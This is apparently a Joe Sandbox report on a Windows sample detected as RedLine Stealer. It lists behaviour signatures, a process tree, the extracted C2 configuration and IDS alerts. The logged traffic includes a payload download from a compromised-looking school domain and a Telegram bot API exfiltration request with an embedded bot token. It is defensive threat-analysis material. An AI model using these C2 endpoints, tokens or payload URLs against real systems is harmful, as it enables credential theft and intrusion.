Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
66dcad8f5f33a_crypted.exe

Overview

General Information

Sample name:66dcad8f5f33a_crypted.exe
Analysis ID:1507478
MD5:b8010780cbccba9ec2e20d7b3c17c6be
SHA1:30904082c6866796d664f0042780207c5fcf59ba
SHA256:49c25f225e9c5a3ffb651a2ede3505b0faccfbef4f43652d7321388ce6c4b864
Tags:exe
Infos:

Detection

MicroClip, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected MicroClip
Yara detected RedLine Stealer
.NET source code contains very large array initializations
.NET source code contains very large strings
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Drops large PE files
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 66dcad8f5f33a_crypted.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe" MD5: B8010780CBCCBA9EC2E20D7B3C17C6BE)
    • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1264 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • filename.exe (PID: 3672 cmdline: "C:\Users\user~1\AppData\Local\Temp\filename.exe" MD5: 556A8B2AFEF96F81ACDE6CA1A525650E)
        • Path.exe (PID: 5204 cmdline: "C:\ProgramData\Path\Path.exe" MD5: 7106B8DDE9093C302EB124DDBB6E4C81)
        • cmd.exe (PID: 3916 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5445.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6304 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "5.42.92.222:7880", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.1659124190.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.1477865176.0000000003E25000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Process Memory Space: 66dcad8f5f33a_crypted.exe PID: 6564JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.66dcad8f5f33a_crypted.exe.3e25570.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  11.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    0.2.66dcad8f5f33a_crypted.exe.3e25570.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Use Short Name Path in Command Line
                      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\filename.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\filename.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\filename.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\filename.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\filename.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 1264, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\filename.exe" , ProcessId: 3672, ProcessName: filename.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-08T14:56:30.164427+020020432341A Network Trojan was detected5.42.92.2227880192.168.2.749707TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-08T14:56:29.917700+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:35.215382+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:35.557609+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:35.854781+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:36.918874+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:37.263855+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:37.524282+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:37.554788+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:37.939834+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:38.470543+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:38.685058+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:38.938275+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:39.153125+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:39.372179+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:40.058746+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:40.270959+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:40.481745+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:40.692023+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:40.905295+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:41.120053+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:41.360403+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:41.597529+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:41.808539+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:45.622347+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      2024-09-08T14:56:45.871201+020020432311A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-08T14:56:35.430165+020020460561A Network Trojan was detected5.42.92.2227880192.168.2.749707TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-08T14:56:44.331166+020020185811A Network Trojan was detected192.168.2.749708194.163.35.141443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-08T14:56:29.917700+020020460451A Network Trojan was detected192.168.2.7497075.42.92.2227880TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 66dcad8f5f33a_crypted.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\ProgramData\Path\Path.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Found malware configuration
                      Source: 00000000.00000002.1477865176.0000000003E25000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "5.42.92.222:7880", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeJoe Sandbox ML: detected
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 194.163.35.141:443 -> 192.168.2.7:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49710 version: TLS 1.2
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0701B0E8h11_2_0701ABF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0701693Ah11_2_07016518
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 07016DBAh11_2_07016518
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0701888Ch11_2_070185C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_07017050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 070127FFh11_2_070120A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 07014DD9h11_2_07014DC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 07012F9Fh11_2_07012BC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 07012F9Fh11_2_07012BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 07015D4Bh11_2_07015A98

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49707 -> 5.42.92.222:7880
                      Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49707 -> 5.42.92.222:7880
                      Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 5.42.92.222:7880 -> 192.168.2.7:49707
                      Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 5.42.92.222:7880 -> 192.168.2.7:49707
                      Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49708 -> 194.163.35.141:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 5.42.92.222:7880
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficTCP traffic: 192.168.2.7:49707 -> 5.42.92.222:7880
                      Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Host: smkn2sumbawabesar.sch.idConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/EgQVHrqH HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7e3a2533-b8ae-42ab-9b1f-c8a90fd05a6f"Host: api.telegram.orgContent-Length: 708232Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.42.92.222
                      Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Host: smkn2sumbawabesar.sch.idConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/EgQVHrqH HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: smkn2sumbawabesar.sch.id
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7e3a2533-b8ae-42ab-9b1f-c8a90fd05a6f"Host: api.telegram.orgContent-Length: 708232Expect: 100-continueConnection: Keep-Alive
                      Source: filename.exe, 0000000D.00000002.2208257467.00000000033B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: filename.exe, 0000000D.00000002.2208257467.00000000033B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: filename.exe, 0000000D.00000002.2208257467.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: filename.exe, 0000000D.00000002.2208257467.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
